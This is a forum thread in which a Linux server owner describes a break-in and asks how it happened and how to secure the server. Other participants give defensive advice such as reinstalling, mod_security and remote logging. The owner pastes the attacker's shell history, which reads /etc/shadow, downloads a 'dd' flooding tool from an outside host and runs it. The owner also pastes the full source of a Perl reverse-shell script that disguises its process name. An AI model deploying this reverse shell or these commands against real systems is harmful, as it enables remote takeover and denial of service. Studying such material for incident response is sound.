TSHAW
asked on
Linux: Possible root vulnerability, through url code injection
Hello, I've searched my question and I found something similar in the ID: 21727726. But I have an extra problem. The hacker didn't just copy the "back" file to the /tmp directory but also, I found in the /root/.bash_history the following set of commands that I didn't introduce in any terminal of my server:
ifconfig
ifconfig -all
ifconfig ?
ifconfig --help
man ifconfig
id
cd /etc
ls -la
cd yum
ls -la
cat /etc/shadow
wget http://ddmalfa.cz/_adm/dd
chmod 777 dd
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
Apparently the hacker accessed my server as root (since it is the only way he could possibly ran the commands in a superuser terminal) and ran that set of commands, including the download of the dd script; I'm sure he didn't accessed by putting the correct password, because he didn't changed it and I've already search in the logs for ssh failures. I'm attaching the screenshot of the dd script code. If you need it I can send it to you.
We first noticed the attack because our site just became unreachable and even through the FW we didn't reach the servers. When I first accesed the server (fisically) I just saw the "dd" process running with the 100% of the CPU, so I proceeded to kill it. After that the server got normal and so the FW.
So my question:
1.- Is he really accessed my server as root?
2.- If it is so, what do I have to do to protect it?
Thank you in advance
ifconfig
ifconfig -all
ifconfig ?
ifconfig --help
man ifconfig
id
cd /etc
ls -la
cd yum
ls -la
cat /etc/shadow
wget http://ddmalfa.cz/_adm/dd
chmod 777 dd
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
Apparently the hacker accessed my server as root (since it is the only way he could possibly ran the commands in a superuser terminal) and ran that set of commands, including the download of the dd script; I'm sure he didn't accessed by putting the correct password, because he didn't changed it and I've already search in the logs for ssh failures. I'm attaching the screenshot of the dd script code. If you need it I can send it to you.
We first noticed the attack because our site just became unreachable and even through the FW we didn't reach the servers. When I first accesed the server (fisically) I just saw the "dd" process running with the 100% of the CPU, so I proceeded to kill it. After that the server got normal and so the FW.
So my question:
1.- Is he really accessed my server as root?
2.- If it is so, what do I have to do to protect it?
Thank you in advance
"back" code:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
ahoffmann
do you probably have vulnerable web applications on that server?
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
> 1. Reinstall your server.
FULL ACK
:)
> 8. use mod security to protect your apache
hmm, mod_security can protect you application, but it can protect apapche only partially
remember that mod_security is a module inside apache
FULL ACK
:)
> 8. use mod security to protect your apache
hmm, mod_security can protect you application, but it can protect apapche only partially
remember that mod_security is a module inside apache
ASKER
1.- This server is a Webserver (web application)
2.- This server is behind a Juniper Netscreen FireWall, all the ports are protected the only one that is open is the 80 and it's redirected to the server through a VIP service
3.- The servers are not direct reachable from ssh, ftp or telnet from the internet. I have a VPN from my office to administrate them, with local ip addresses.
4.- Apache is not running as root.
I think that it is difficult to access direct to the server considering the above. So maybe the hacker really accessed my server through some vulnerability of the web appl, iisn't it?
2.- This server is behind a Juniper Netscreen FireWall, all the ports are protected the only one that is open is the 80 and it's redirected to the server through a VIP service
3.- The servers are not direct reachable from ssh, ftp or telnet from the internet. I have a VPN from my office to administrate them, with local ip addresses.
4.- Apache is not running as root.
I think that it is difficult to access direct to the server considering the above. So maybe the hacker really accessed my server through some vulnerability of the web appl, iisn't it?
if your server (httpd process) is not running as root, and the default server (that part which is serverd as user root) is not accessable, then there're only 2 possibilities left:
1. the web server (apache httpd here) itself has a vulnerability
2. any of the applications uses/calls an external program which can get root access
Do you have any hints in your access_log or error_log?
1. the web server (apache httpd here) itself has a vulnerability
2. any of the applications uses/calls an external program which can get root access
Do you have any hints in your access_log or error_log?
The scenerio you saying, then its looks like its done via web server...
what kind of website is your server holding ?? does any website require to play with Linux file system or some thing like that ??
what i meant is, does any website has any ability to modify Linux file system for any kind of purpose.. or anything ..
is your apache is up2date ?? is your Linux server up2date ??
what kind of website is your server holding ?? does any website require to play with Linux file system or some thing like that ??
what i meant is, does any website has any ability to modify Linux file system for any kind of purpose.. or anything ..
is your apache is up2date ?? is your Linux server up2date ??
ASKER
ahoffmann:
1.- The apache child processes are running as nobody but indeed the default server is running as root. So what do I have to do to be sure this default server (root running) is not accesable .
2.- I've already looked at the access_log and error_log and I didn't see anything wrong.
fosiul01:
1.- My web site is an AVL (automatic vehicle location) developed in php. As far as I can remember there is'nt any part of the website that access Linux file system. I indeed have some php scripts that run over cli but those scripts are not accesable from web (these php scripts do play with Linux file system).
2.- We are now updating apache and linux right now (to tell you the truth we didn't update them for a while).
note: We just decided to run apache in a higher port ( 1030 ) so the FW do the translation from the 80 to the 1030 and to use a user called "webserver" to run apache. What do you think?
1.- The apache child processes are running as nobody but indeed the default server is running as root. So what do I have to do to be sure this default server (root running) is not accesable .
2.- I've already looked at the access_log and error_log and I didn't see anything wrong.
fosiul01:
1.- My web site is an AVL (automatic vehicle location) developed in php. As far as I can remember there is'nt any part of the website that access Linux file system. I indeed have some php scripts that run over cli but those scripts are not accesable from web (these php scripts do play with Linux file system).
2.- We are now updating apache and linux right now (to tell you the truth we didn't update them for a while).
note: We just decided to run apache in a higher port ( 1030 ) so the FW do the translation from the 80 to the 1030 and to use a user called "webserver" to run apache. What do you think?
update both Apache and linux ( but REinstall first) dont update the same server. Reinstall totaly then install again.
Put firewall .. install modsecuiry, Now a days , most company using mod security for apache level firewall
also use Reverse proxy concept , it will save 90% to hack your main server ....
also, Since you have been hacked onecE!! keep all your log to a different server. which cant be accessible from outside . if any incident happended you will know how this happended.
as i said, hacker first thing they do is , delete all the offensive log from compromised server
Put firewall .. install modsecuiry, Now a days , most company using mod security for apache level firewall
also use Reverse proxy concept , it will save 90% to hack your main server ....
also, Since you have been hacked onecE!! keep all your log to a different server. which cant be accessible from outside . if any incident happended you will know how this happended.
as i said, hacker first thing they do is , delete all the offensive log from compromised server
I feel sorry for TSHAW and this certainly seems to be a hard lesson..
Adding to the experts here,
If you are hacked once, you are going to be hacked again. So you have to be prepared. Before sending the server to production, do a vulnerability scan on the server (you can use Web Inspect or Nikto, there are lots out there)
Once done along with the experts suggestions - deploy. A syslog server also would help so that you webserver can direct its logs to it.
Adding to the experts here,
If you are hacked once, you are going to be hacked again. So you have to be prepared. Before sending the server to production, do a vulnerability scan on the server (you can use Web Inspect or Nikto, there are lots out there)
Once done along with the experts suggestions - deploy. A syslog server also would help so that you webserver can direct its logs to it.